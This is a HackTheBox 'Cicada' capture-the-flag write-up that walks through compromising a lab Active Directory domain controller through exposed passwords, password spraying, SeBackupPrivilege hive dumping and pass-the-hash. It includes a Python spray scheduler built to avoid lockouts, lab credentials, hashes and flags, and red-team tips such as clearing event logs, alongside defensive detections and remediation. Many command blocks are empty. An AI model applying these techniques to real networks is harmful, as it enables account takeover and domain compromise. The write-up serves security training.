Machine Information#
- Name: Cicada
- IP: 10.129.231.149
- OS: Windows Server 2022 Build 20348
- Difficulty: Easy
- Release Date: September 26, 2024
- Creator: @theblxckcicada
- Domain: cicada.htb
Reconnaissance#
Initial Nmap Scan#
| |
Results:
| |
Analysis:
- This is a Windows Domain Controller
- WinRM (5985) is open - potential for remote management
- SMB (445) is open - check for anonymous access
- LDAP (389/636) is available - can enumerate domain information
- Domain name: cicada.htb
Add Domain to Hosts File#
| |
Enumeration#
Step 1: SMB Share Enumeration (Anonymous Access)#
Check for accessible SMB shares without authentication:
| |
Explanation: The -N flag suppresses the password prompt, attempting anonymous/guest authentication.
Results:
| |
Key Finding: HR share is accessible anonymously! This is a critical misconfiguration.
Step 2: Access HR Share#
| |
Download all files from the share:
| |
File Retrieved: Notice from HR.txt
Contents:
| |
Critical Finding: Default password exposed: Cicada$M6Corpb*@Lp#nZp!8
Explanation: Organizations sometimes use default passwords for new employees. This is a severe security risk if:
- The password is documented in accessible locations
- Users don’t change it immediately
- It’s the same for multiple accounts
Initial Foothold#
Step 3: RID Brute Force - User Enumeration#
We have a password but no username. Let’s enumerate domain users using RID brute forcing.
What is RID Brute Forcing?
- Every Windows user has a Security Identifier (SID)
- Format: S-1-5-21-{domain identifier}-{RID}
- The RID (Relative Identifier) is assigned sequentially: 500 is the built-in Administrator, 501 is Guest, 502 is krbtgt, and ordinary domain users and groups start at 1000 and count upward
- We can resolve RIDs to names over SMB (SAMR/LSA lookups) to discover accounts
- Here a guest session (empty password) is enough to perform the lookups, so no valid credentials are needed yet
Command:
| |
Alternative commands (all work):
| |
Results - Domain Users Discovered:
| |
Key Users Identified:
- john.smoulder
- sarah.dantelia
- michael.wrightson
- david.orelious
- emily.oscars
Step 4: Password Spraying#
Create a user list and spray the default password:
| |
Password Spray Attack:
| |
Explanation:
- Password spraying tries one password against multiple users
- --continue-on-success keeps testing after the first valid credential is found, so one run checks every user
- Spraying stays below the account lockout threshold (one attempt per account per round), which brute forcing a single account does not; check the domain lockout policy first and keep the number of rounds inside one observation window below the threshold
Result:
| |
Success! Valid credentials found: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
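The two steps above (RID brute force for usernames, then spraying one password) can be scripted around the lockout policy. The following Python is an added example, not part of the original writeup: it parses `--rid-brute` output into a spray list (the sample output lines are constructed and the RID values are assumed, not taken from the box) and schedules spray rounds so that no account collects more failures inside the observation window than the lockout threshold allows.

```python
"""Added example (not from the original writeup): turn nxc --rid-brute output into a
user list and plan a password spray that respects the domain lockout policy.
The sample output and RID values below are constructed for illustration."""
import re
from dataclasses import dataclass

# Constructed sample of what `nxc smb <target> -u guest -p '' --rid-brute` prints.
SAMPLE_RID_BRUTE_OUTPUT = """\
SMB  10.129.231.149  445  CICADA-DC  500: CICADA\\Administrator (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  501: CICADA\\Guest (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  502: CICADA\\krbtgt (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  512: CICADA\\Domain Admins (SidTypeGroup)
SMB  10.129.231.149  445  CICADA-DC  1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1104: CICADA\\john.smoulder (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1106: CICADA\\michael.wrightson (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1108: CICADA\\david.orelious (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1601: CICADA\\emily.oscars (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType>)" ; the name may contain spaces (e.g. "Domain Admins")
RID_LINE = re.compile(r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)")


def parse_rid_brute(output: str, skip_machine_accounts: bool = True) -> list[str]:
    """Return the names of SidTypeUser entries, dropping groups and aliases.
    Machine accounts end in '$' and are not useful spray targets."""
    users = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if not m or m["kind"] != "SidTypeUser":
            continue
        if skip_machine_accounts and m["name"].endswith("$"):
            continue
        users.append(m["name"])
    return users


@dataclass(frozen=True)
class SprayRound:
    password: str
    start_minute: int  # offset from the start of the spray at which this round may begin


def plan_spray(passwords, lockout_threshold: int, observation_window_minutes: int, safety_margin: int = 1):
    """One round = one password tried once against every user.
    With threshold T, at most T-1-safety_margin failures per account may fall inside one
    observation window, so later rounds are pushed into the next window.
    A threshold of 0 means lockout is disabled and no spacing is needed."""
    if lockout_threshold == 0:
        per_window = len(passwords) or 1
    else:
        per_window = lockout_threshold - 1 - safety_margin
        if per_window < 1:
            raise ValueError("lockout policy leaves no safe attempts per window")
    return [SprayRound(p, (i // per_window) * observation_window_minutes) for i, p in enumerate(passwords)]


if __name__ == "__main__":
    users = parse_rid_brute(SAMPLE_RID_BRUTE_OUTPUT)
    with open("users.txt", "w") as fh:
        fh.write("\n".join(users) + "\n")
    # Assumed policy of 5 attempts / 30 minutes; read the real one with the tool's password-policy option first.
    for r in plan_spray(["Cicada$M6Corpb*@Lp#nZp!8"], lockout_threshold=5, observation_window_minutes=30):
        print(f"t+{r.start_minute:>3} min: nxc smb 10.129.231.149 -u users.txt -p '{r.password}' --continue-on-success")
```

The scheduler deliberately leaves one attempt of headroom below the threshold so a user's own typo in the same window does not lock them out and reveal the spray.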
Lateral Movement#
Step 5: Authenticated SMB Enumeration#
Check what shares Michael can access:
| |
Results:
| |
Note: smbmap reports the DEV share as NO ACCESS for michael.wrightson. Keep it in mind; share access is re-tested later with other credentials. Next, use the valid credentials for an authenticated LDAP dump.
Step 6: LDAP Domain Dump#
Use authenticated LDAP access to gather comprehensive domain information:
| |
Explanation: ldapdomaindump queries LDAP and creates HTML reports with:
- All domain users
- User descriptions (often contain passwords!)
- Group memberships
- Computer accounts
- Domain policies
Files Created:
- domain_users.html
- domain_users.json
- domain_groups.html
- domain_computers.html
- etc.
Step 7: Finding Second Set of Credentials#
Examine the domain_users.json for interesting information:
| |
Critical Finding in David Orelious’s Account:
| |
Explanation: Storing passwords in user descriptions is a critical security flaw. Admins sometimes do this for “convenience” but it’s visible to any authenticated user via LDAP.
New Credentials Found: david.orelious:aRt$Lp#7t*VQ!3
Step 8: Testing WinRM Access with David’s Credentials#
| |
Result:
| |
Failed! David doesn’t have WinRM access. Let’s check the DEV share instead.
Step 9: Accessing DEV Share with David’s Credentials#
| |
Success! David can access the DEV share.
Commands in SMB:
| |
Step 10: Analyzing Backup Script#
File: Backup_script.ps1
Contents:
| |
Critical Finding: Hardcoded credentials in the script!
- Username: emily.oscars
- Password: Q!3@Lp#M6b*7t*Vt
Explanation: Embedding credentials in scripts is a common but dangerous practice. This is especially risky when scripts are stored in accessible shares.
Step 11: Testing Emily’s Credentials#
| |
Result:
| |
Success! Emily has WinRM access. The “(Pwn3d!)” indicator means we can get a shell!
Step 12: Getting Initial Shell#
| |
Explanation: Evil-WinRM uses the WinRM protocol (Windows Remote Management) to get a PowerShell session. It requires:
- Valid credentials (a password or an NT hash)
- The user must be a member of "Remote Management Users" or a local administrator on the host
- The WinRM service must be listening (port 5985 for HTTP, 5986 for HTTPS)
Success! We’re in:
| |
Step 13: Getting User Flag#
| |
User Flag: ff94c460876f705c2f45270e5ae4b076
Privilege Escalation#
Step 14: Enumerate User Privileges#
Check what permissions Emily has:
| |
Key Findings:
| |
Critical Privileges:
- Backup Operators Group: Built-in privileged group
- SeBackupPrivilege: Can read ANY file on the system, bypassing ACLs
- SeRestorePrivilege: Can write to ANY location on the system
Explanation:
- Backup Operators is designed for backup software
- SeBackupPrivilege lets backup tools read files even when ACLs deny access
- This is essentially a “read-anything” privilege
- We can abuse this to read the Administrator’s files or dump password hashes
Method 1: Easy Root Flag Retrieval#
The quickest way to get the root flag is using robocopy with backup mode:
| |
Explanation:
- robocopy is Windows' robust file copy utility
- The /b flag enables "backup mode", which uses SeBackupPrivilege to open files with backup semantics
- This bypasses NTFS permissions and ACLs
- We can copy files we normally can’t access
Root Flag: 6e2b72509a4ecbb85b1e7df87cce9c7f
Method 2: Full Administrator Access (Pass-the-Hash)#
For complete system compromise, we’ll extract the Administrator password hash.
Step 15: Set Up SMB Server on Attacker Machine#
On your Kali machine:
| |
Explanation: We need a network share to exfiltrate the registry hives. The SMB server will receive the files from the Windows machine.
Step 16: Dump Registry Hives#
Back in your Evil-WinRM session:
| |
Explanation:
- SYSTEM hive: holds the boot key (syskey), from which the key protecting the SAM hashes is derived
- SAM hive: Security Account Manager database with password hashes
- reg save: Windows command to export registry hives
- SeBackupPrivilege allows us to read these protected registry keys
- We exfiltrate them via SMB to our Kali machine
Actual Commands Used:
| |
Step 17: Extract Password Hashes#
On Kali, fix permissions and extract hashes:
| |
Explanation:
- secretsdump.py is an Impacket tool
- It derives the boot key from the SYSTEM hive and uses it to decrypt the SAM database
- Extracts NTLM password hashes for all local users
Results:
| |
Administrator Hash: 2b87e7c93a3e8a0ea4a581937016f341
Explanation of Hash Format:
- First part (aad3b435…): LM hash; this specific value is the LM hash of an empty string, meaning LM hashes are not stored (the default on modern Windows)
- Second part (2b87e7c9…): NT hash (MD4 of the UTF-16LE password), the value we need
- NTLM hashes can be used directly for authentication (Pass-the-Hash)
Step 18: Pass-the-Hash Attack#
Use the Administrator hash to get a privileged shell:
| |
Explanation - Pass-the-Hash:
- Windows authenticates using NTLM hashes
- We don’t need the plaintext password
- The hash can be used directly for authentication
- This is why hash extraction is so powerful
Alternative with psexec:
| |
Success! Administrator Shell:
| |
Step 19: Retrieve Root Flag#
| |
Root Flag: 6e2b72509a4ecbb85b1e7df87cce9c7f
Flags#
User Flag#
Location: C:\Users\emily.oscars.CICADA\Desktop\user.txt
Flag: ff94c460876f705c2f45270e5ae4b076
Root Flag#
Location: C:\Users\Administrator\Desktop\root.txt
Flag: 6e2b72509a4ecbb85b1e7df87cce9c7f
Attack Chain Summary#
| |
Key Takeaways#
Vulnerabilities Exploited#
Anonymous SMB Access (CWE-284)
- HR share accessible without authentication
- Contained sensitive default password documentation
Weak Password Management (CWE-521)
- Single default password used for multiple new hires
- Password documented in accessible location
- No forced password change on first login
Information Disclosure via RID Enumeration (CWE-200)
- Guest/anonymous account could enumerate all domain users
- Enabled username discovery for password spraying
Password in User Description (CWE-522)
- David Orelious’s password stored in LDAP description field
- Visible to any authenticated domain user
- Critical OPSEC failure
Hardcoded Credentials (CWE-798)
- Backup script contained plaintext credentials
- Script stored in accessible SMB share
- No encryption or secure storage
Excessive Privileges (CWE-269)
- Emily.oscars added to Backup Operators group unnecessarily
- SeBackupPrivilege allows reading any file on the system
- Enabled privilege escalation to Administrator
Inadequate Access Controls (CWE-732)
- DEV share contained sensitive scripts
- Accessible by regular domain users
- Should be restricted to administrators only
Tools Used#
| Tool | Purpose | Key Commands |
|---|---|---|
| nmap | Port scanning | nmap -sC -sV -oA scan target |
| smbclient | SMB share access | smbclient //host/share -U user |
| smbmap | SMB enumeration | smbmap -u user -p pass -H host |
| netexec/crackmapexec | SMB/WinRM testing | nxc smb host -u user -p pass --rid-brute |
| ldapdomaindump | LDAP enumeration | ldapdomaindump host -u 'domain\user' -p pass |
| evil-winrm | WinRM shell | evil-winrm -i host -u user -p pass |
| impacket-smbserver | SMB server | impacket-smbserver share /path -smb2support |
| secretsdump.py | Hash extraction | secretsdump.py -sam SAM -system SYSTEM LOCAL |
| robocopy | File copy w/ backup mode | robocopy /b source dest file |
| reg save | Registry export | reg save HKLM\SAM file |
Defense Recommendations#
Immediate Actions#
Remove anonymous SMB access
- Disable the Guest account; it is what the "anonymous" share listing and the RID brute force were authenticating as
- Require authentication for all shares
- Command:
net user guest /active:no
Restrict anonymous SID/Name translation and SAM enumeration
- Configure "Network access: Allow anonymous SID/Name translation" (Disabled) and "Network access: Do not allow anonymous enumeration of SAM accounts and shares" (Enabled), which sets HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous to 1
- RestrictAnonymous = 2 is a Windows 2000-era setting and is not the supported way to do this on current Windows; use the policy settings above
- On a domain controller these settings do not stop an authenticated (including guest) session from enumerating domain accounts over SAMR, so disabling Guest is the control that actually closes this path
โ Clean up password exposures
- Remove passwords from user descriptions
- Audit all LDAP attributes for sensitive data
- Remove hardcoded credentials from scripts
โ Review group memberships
- Remove users from Backup Operators unless absolutely necessary
- Audit all privileged group memberships
- Implement just-in-time (JIT) access
Long-term Improvements#
Implement LAPS (Local Administrator Password Solution)
- Randomizes local admin passwords on member servers and workstations
- Stores them securely in AD
- Auto-rotates on schedule
- Caveat: LAPS manages the built-in local Administrator account of domain members; it does not cover the domain Administrator account compromised on the DC here, so it complements rather than replaces the fixes above
Password Policy Enforcement
- Eliminate default passwords
- Force password change on first logon
- Implement password complexity requirements
- Use Group Policy: Computer Configuration → Policies → Windows Settings → Security Settings → Account Policies → Password Policy
Credential Management
- Use Windows Credential Manager
- Implement Azure Key Vault or similar
- Never store passwords in scripts or descriptions
- Use service accounts with minimal privileges
SMB Hardening
- Enable SMB signing (prevents relay attacks)
- Disable SMBv1 (deprecated and insecure)
- Implement share-level permissions carefully
- Commands:
```powershell
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
```
Privilege Monitoring
- Monitor SeBackupPrivilege usage
- Alert on registry hive access
- Implement Windows Event Log monitoring
- Watch for Event IDs: 4672, 4673, 4697
Network Segmentation
- Separate Domain Controllers from user networks
- Implement firewall rules
- Use VLANs for different security zones
Regular Security Audits
- Scan for anonymous SMB shares
- Review LDAP attributes for sensitive data
- Audit privileged group memberships
- Penetration testing quarterly
Active Directory Best Practices#
Principle of Least Privilege
- Users should have minimum necessary permissions
- Use temporary privilege elevation when needed
- Regular access reviews
Secure Administrative Practices
- Use separate admin accounts for privileged tasks
- Never log into workstations with domain admin accounts
- Implement Protected Users group
Password Protection
- Deploy LAPS for local administrators
- Use long, complex passwords (15+ characters)
- Implement password rotation policies
- Consider passwordless authentication (FIDO2, Windows Hello)
Monitoring and Detection
- Enable advanced threat protection (ATP)
- Monitor for suspicious LDAP queries
- Alert on unexpected privilege escalations
- Implement SIEM (Security Information and Event Management)
Pentester Notes#
Enumeration Checklist#
- Anonymous SMB access (smbclient -L //target -N)
- RID brute force (nxc smb target -u guest -p '' --rid-brute)
- LDAP anonymous bind (ldapsearch -x -H ldap://target)
- Password spraying (one password, many users)
- Check user descriptions for passwords
- Look for backup files, scripts, configs in shares
- Test WinRM access (nxc winrm target -u user -p pass)
Privilege Escalation Checklist#
- Check whoami /priv for dangerous privileges
  - SeBackupPrivilege → Dump SAM/SYSTEM
  - SeDebugPrivilege → Process injection
  - SeImpersonatePrivilege → Potato exploits
- Check group memberships (whoami /groups)
  - Backup Operators → Read any file
  - Account Operators → Create users and manage non-protected groups (cannot directly touch admin groups, but can seed accounts for further abuse)
Key Windows Privileges to Watch For#
| Privilege | Abuse Method | Impact |
|---|---|---|
| SeBackupPrivilege | Dump registry hives | Read Administrator hash |
| SeRestorePrivilege | Write to protected locations | Persistence |
| SeDebugPrivilege | Process injection | SYSTEM access |
| SeImpersonatePrivilege | Token impersonation | SYSTEM access |
| SeTakeOwnershipPrivilege | Take file ownership | Access any file |
| SeLoadDriverPrivilege | Load malicious driver | Kernel access |
Quick Reference Commands#
Complete Attack Path#
| |
One-Liner Enumeration Script#
| |
Additional Attack Vectors (Not Used But Available)#
Kerberoasting#
Using any of the domain credentials gathered above, service ticket hashes for accounts with SPNs can be requested and cracked offline:
| |
AS-REP Roasting#
Check for accounts without Kerberos pre-authentication:
| |
BloodHound Enumeration#
Map the entire AD environment:
| |
NTDS.dit Extraction (Domain Controller)#
Since this is a DC, we could dump all domain hashes:
| |
Lessons Learned#
For Blue Team#
Detection Opportunities:
Anonymous SMB Access
- Event ID 5140 (Share accessed)
- Monitor for guest/anonymous account usage
RID Brute Force
- Many SAMR/LSA lookup requests (SID-to-name translations) from a single IP in a short time
- Event ID 4661 (A handle to an object was requested, object type SAM_DOMAIN/SAM_USER) when SAM object-access auditing is enabled; note that 4798/4799 record local group membership enumeration, not SID lookups
Password Spray
- Multiple failed logons with same password
- Event ID 4625 (Failed logon)
- Look for same source IP hitting multiple accounts
LDAP Queries
- Unusual or broad LDAP searches (for example every user object with its description attribute)
- Event ID 1644 in the Directory Service log records expensive or inefficient searches, but only once the "15 Field Engineering" diagnostics level and the search thresholds are configured; by default nothing is logged
SeBackupPrivilege Abuse
- Event ID 4673 (Sensitive privilege use)
- Registry hive access from non-system accounts
- Unusual robocopy usage
Pass-the-Hash
- Event ID 4624 (Successful logon) with LogonType 3 and AuthenticationPackageName NTLM, plus 4776 on the DC for the NTLM credential validation
- No matching Kerberos ticket events (4768/4769) for that account around the same time
- NTLM network logons are common in many environments, so scope to privileged accounts and baseline per source host before alerting
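To make the detection list concrete, here is an added Python example (not part of the writeup) that implements three of the rules above over constructed Security events: a spray detector on 4625 grouped by source IP, NTLM network logons (4624, LogonType 3) for privileged accounts, and 4673 SeBackupPrivilege use by non-service identities. Field names follow the Windows event XML; the IPs, hostnames and timestamps are made up.

```python
"""Added example (not from the original writeup): three detections over constructed
Windows Security events. IPs, hosts and timestamps are invented for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample events (not real log data).
EVENTS = [
    # Spray: one source IP, five different accounts, failures seconds apart
    *({"EventID": 4625, "Time": _t(f"2025-11-14T10:00:{i:02d}"), "IpAddress": "10.10.14.5",
       "TargetUserName": u, "Status": "0xc000006d"}
      for i, u in enumerate(["john.smoulder", "sarah.dantelia", "michael.wrightson",
                             "david.orelious", "emily.oscars"])),
    # Ordinary typo by a real user: two failures, one account
    {"EventID": 4625, "Time": _t("2025-11-14T10:01:00"), "IpAddress": "10.10.20.7",
     "TargetUserName": "sarah.dantelia", "Status": "0xc000006d"},
    {"EventID": 4625, "Time": _t("2025-11-14T10:01:05"), "IpAddress": "10.10.20.7",
     "TargetUserName": "sarah.dantelia", "Status": "0xc000006d"},
    # Pass-the-hash: NTLM network logon as Administrator from the same attacker IP
    {"EventID": 4624, "Time": _t("2025-11-14T10:30:00"), "IpAddress": "10.10.14.5", "LogonType": 3,
     "TargetUserName": "Administrator", "AuthenticationPackageName": "NTLM", "WorkstationName": "KALI"},
    # Kerberos network logon and a machine-account NTLM logon: expected background noise
    {"EventID": 4624, "Time": _t("2025-11-14T10:31:00"), "IpAddress": "10.10.20.7", "LogonType": 3,
     "TargetUserName": "sarah.dantelia", "AuthenticationPackageName": "Kerberos", "WorkstationName": "WS01"},
    {"EventID": 4624, "Time": _t("2025-11-14T10:32:00"), "IpAddress": "10.10.20.9", "LogonType": 3,
     "TargetUserName": "WS01$", "AuthenticationPackageName": "NTLM", "WorkstationName": "WS01"},
    # SeBackupPrivilege: reg.exe run by a domain user vs. a scheduled service under SYSTEM
    {"EventID": 4673, "Time": _t("2025-11-14T10:20:00"), "SubjectUserName": "emily.oscars",
     "PrivilegeList": "SeBackupPrivilege", "ProcessName": "C:\\Windows\\System32\\reg.exe"},
    {"EventID": 4673, "Time": _t("2025-11-14T03:00:00"), "SubjectUserName": "SYSTEM",
     "PrivilegeList": "SeBackupPrivilege", "ProcessName": "C:\\Windows\\System32\\svchost.exe"},
]


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Alert when one source IP fails logons for >= min_accounts distinct users inside the window.
    Per-account failure counts stay low during a spray, so the pivot must be the source, not the user."""
    failures = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append(e)
    alerts = []
    for ip, evs in failures.items():
        evs.sort(key=lambda e: e["Time"])
        for i, first in enumerate(evs):
            users = {e["TargetUserName"] for e in evs[i:] if e["Time"] - first["Time"] <= window}
            if len(users) >= min_accounts:
                alerts.append({"ip": ip, "accounts": sorted(users), "first_seen": first["Time"]})
                break
    return alerts


def detect_ntlm_network_logons(events, watch_accounts=("Administrator",)):
    """4624 LogonType 3 with NTLM for watched accounts, ignoring machine accounts ($).
    NTLM network logons are normal in most domains, so this is scoped to privileged accounts."""
    return [e for e in events
            if e["EventID"] == 4624 and e.get("LogonType") == 3
            and e.get("AuthenticationPackageName") == "NTLM"
            and not e["TargetUserName"].endswith("$")
            and e["TargetUserName"] in watch_accounts]


def detect_backup_privilege_use(events, service_identities=("SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE")):
    """4673 with SeBackupPrivilege exercised by a user identity rather than a service account.
    Needs 'Audit Sensitive Privilege Use' enabled; it is noisy, so the process name is kept for triage."""
    return [e for e in events
            if e["EventID"] == 4673 and "SeBackupPrivilege" in e["PrivilegeList"]
            and e["SubjectUserName"].upper() not in service_identities]


if __name__ == "__main__":
    for a in detect_password_spray(EVENTS):
        print(f"[spray] {a['ip']} hit {len(a['accounts'])} accounts from {a['first_seen']}")
    for e in detect_ntlm_network_logons(EVENTS):
        print(f"[pth?]  {e['TargetUserName']} NTLM type-3 logon from {e['IpAddress']} ({e['WorkstationName']})")
    for e in detect_backup_privilege_use(EVENTS):
        print(f"[priv]  {e['SubjectUserName']} used SeBackupPrivilege via {e['ProcessName']}")
```

The spray rule keys on the source address because a well-paced spray produces only one or two failures per account, which per-user thresholds never reach.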
For Red Team#
Stealth Improvements:
- Use smaller user lists for password spraying (avoid lockouts)
- Add delays between authentication attempts
- Use compromised domain machines for attacks (blend with normal traffic)
- Prefer Kerberos over NTLM when possible
- Clean up artifacts (temp files, event logs if possible)
- Use legitimate admin tools (Living Off The Land)
Alternative Techniques:
- Use PowerShell instead of compiled tools
- Leverage LOLBAS binaries
- In-memory execution to avoid disk writes
- Use native Windows tools (net, wmic, powershell)
Real-World Implications#
How This Happens in Corporate Environments#
Default Passwords
- HR departments create documentation for new hires
- IT uses same password for efficiency
- Users don’t change passwords immediately
- Documentation stored in accessible locations
Password in Descriptions
- Help desk stores passwords for “reference”
- Service account documentation
- Legacy practices from pre-LAPS era
Hardcoded Credentials in Scripts
- Backup scripts need credentials
- Developers prioritize functionality over security
- Scripts shared across teams
- No secrets management solution
Over-Privileged Accounts
- “Just in case” permissions
- Inherited from previous admin
- No regular access reviews
- Convenience over security
Impact Assessment#
If this were a real environment:
| Asset | Impact | Risk Level |
|---|---|---|
| Domain Admin Access | Complete network compromise | CRITICAL |
| User Credentials | Lateral movement capability | HIGH |
| Business Data | Potential data exfiltration | HIGH |
| Email Access | Phishing from internal accounts | HIGH |
| File Shares | Access to confidential documents | MEDIUM |
| Workstations | Deploy ransomware/malware | CRITICAL |
Potential Business Impact:
- Ransomware deployment across entire domain
- Data breach (customer PII, financial records)
- Intellectual property theft
- Regulatory fines (GDPR, HIPAA, etc.)
- Reputation damage
- Business interruption
Estimated Remediation Time:
- Immediate: 2-4 hours (disable compromised accounts)
- Short-term: 1-2 weeks (fix vulnerabilities)
- Long-term: 1-3 months (implement security controls)
Advanced Topics#
Understanding SeBackupPrivilege#
Technical Details:
- Part of Windows Backup and Restore privileges
- Bypasses DACL (Discretionary Access Control List)
- Can read files even with DENY ACLs
- Required for volume shadow copy operations
- Commonly assigned to Backup Operators group
API Calls Used:
- OpenProcessToken() - get the process token
- LookupPrivilegeValue() - get the privilege LUID
- AdjustTokenPrivileges() - enable SeBackupPrivilege in the token (it is present but disabled by default)
- CreateFile() with FILE_FLAG_BACKUP_SEMANTICS, then BackupRead() - open and read the file with the access check bypassed
Abuse Methods:
- Registry hive dumping (SAM, SYSTEM, SECURITY)
- NTDS.dit extraction (Domain Controller)
- Reading protected files (credentials, config files)
- Volume Shadow Copy access
Detection:
| |
Pass-the-Hash Explained#
How It Works:
- Windows stores NT hashes (MD4 of the UTF-16LE password) in the SAM for local accounts and in NTDS.dit for domain accounts, and caches them in LSASS for logged-on users
- NTLM authentication proves possession of the hash, never the plaintext
- The server sends the client a random 8-byte challenge
- The client computes a keyed response (in NTLMv2, HMAC-MD5 with a key derived from the NT hash) over the challenge and a client-supplied blob
- The server (or, for domain accounts, the DC via Netlogon) recomputes the response from the stored hash and compares
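The following Python is an added example, not part of the original writeup: a minimal NTLMv2 challenge/response round trip (the NTOWFv2 and NTProofStr computations from MS-NLMP) with both sides modeled, showing that a client holding only the NT hash is indistinguishable from one holding the password. Message framing, signing/sealing and the Netlogon hop to the DC are omitted. The challenge, client blob and domain values are constructed; the Administrator hash is the one recovered in this writeup.

```python
"""Added example (not from the original writeup): NTLMv2 core computation with a toy
server that stores only NT hashes, to show why pass-the-hash works. Values other than
the recovered Administrator hash are constructed."""
import hashlib
import hmac
import os
import struct
from typing import Dict, Optional, Tuple


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(key = NT hash, UPPER(user) || domain), both UTF-16LE (MS-NLMP 3.3.2)."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_temp(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The client blob ('temp'): RespType 1, HiRespType 1, 6 reserved bytes, FILETIME timestamp,
    8-byte client challenge, 4 reserved bytes, the server's TargetInfo, 4 reserved bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, temp: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || temp, NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)."""
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


class Server:
    """Authenticating side. It holds NT hashes only, as the SAM/NTDS do, and never sees a password."""

    def __init__(self, domain: str, accounts: Dict[str, bytes]):
        self.domain, self.accounts = domain, accounts

    def challenge(self) -> bytes:
        return os.urandom(8)  # CHALLENGE_MESSAGE.ServerChallenge

    def verify(self, user: str, server_challenge: bytes, nt_challenge_response: bytes) -> bool:
        stored = self.accounts.get(user)
        if stored is None or len(nt_challenge_response) < 16:
            return False
        proof, temp = nt_challenge_response[:16], nt_challenge_response[16:]
        expected = hmac.new(ntowf_v2(stored, user, self.domain), server_challenge + temp, hashlib.md5).digest()
        return hmac.compare_digest(proof, expected)


def authenticate(server: Server, user: str, domain: str, nt_hash: bytes, temp: Optional[bytes] = None) -> bool:
    """Client side. Note the input is the NT hash; a plaintext password is never required."""
    chal = server.challenge()
    if temp is None:
        temp = build_temp(timestamp=0, client_challenge=os.urandom(8), target_info=b"")
    return server.verify(user, chal, ntlmv2_response(nt_hash, user, domain, chal, temp))


ADMIN_NT = bytes.fromhex("2b87e7c93a3e8a0ea4a581937016f341")  # recovered from the SAM in this writeup
WRONG_NT = bytes.fromhex("00" * 16)                              # constructed: a hash the DC does not hold


def demo() -> Tuple[bool, bool]:
    """Returns (attacker with the real hash accepted?, attacker with a wrong hash accepted?)."""
    dc = Server("CICADA", {"Administrator": ADMIN_NT})
    return (authenticate(dc, "Administrator", "CICADA", ADMIN_NT),
            authenticate(dc, "Administrator", "CICADA", WRONG_NT))


if __name__ == "__main__":
    ok, bad = demo()
    print(f"pass-the-hash with recovered NT hash: {'accepted' if ok else 'rejected'}")
    print(f"pass-the-hash with wrong NT hash:     {'accepted' if bad else 'rejected'}")
```

Because the server's check needs only the stored hash, the hash is the credential; the fresh server challenge is what stops a captured response from being replayed, but it does nothing against someone who holds the hash itself.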
Why It’s Effective:
- No need to crack the hash
- Hash is the credential
- Works across network protocols (SMB, WinRM, RDP)
- Persists until password is changed
Mitigations:
- Disable NTLM, use Kerberos only
- Enable Credential Guard
- Use Protected Users group
- Implement LAPS
- Network segmentation
Conclusion#
The Cicada machine demonstrates a realistic Active Directory penetration testing scenario. The attack chain exploited multiple common misconfigurations:
- Anonymous SMB access led to information disclosure
- Weak password management enabled initial access
- Poor credential hygiene facilitated lateral movement
- Excessive privileges allowed privilege escalation
Key Takeaway: Security is only as strong as its weakest link. A single misconfiguration (anonymous SMB) led to complete domain compromise.
Final Checklist#
What We Accomplished:
- Enumerated domain users via RID brute force
- Found default password in accessible share
- Discovered credentials in LDAP descriptions
- Extracted credentials from backup scripts
- Gained WinRM access as domain user
- Abused SeBackupPrivilege for privilege escalation
- Extracted Administrator hash from SAM
- Performed Pass-the-Hash attack
- Retrieved both user and root flags
- Achieved complete domain compromise
Resources and References#
Documentation#
- Microsoft: Active Directory Security Best Practices
- NIST: Active Directory Security
- MITRE ATT&CK: Active Directory Techniques
Tools#
Further Learning#
- CRTP - Certified Red Team Professional
- CRTO - Certified Red Team Operator
- HackTricks - Windows Local Privilege Escalation
- PayloadsAllTheThings - Active Directory
Vulnerable by Design Labs#
- HackTheBox Pro Labs (Dante, Offshore, RastaLabs)
- TryHackMe AD rooms
- PentesterLab AD courses
- GOAD (Game of Active Directory)
Credits#
Machine Creator: @theblxckcicada
Platform: HackTheBox
Writeup Author: Based on actual penetration test
Date Pwned: November 14, 2025
Appendix: Full Command Log#
| |
End of Writeup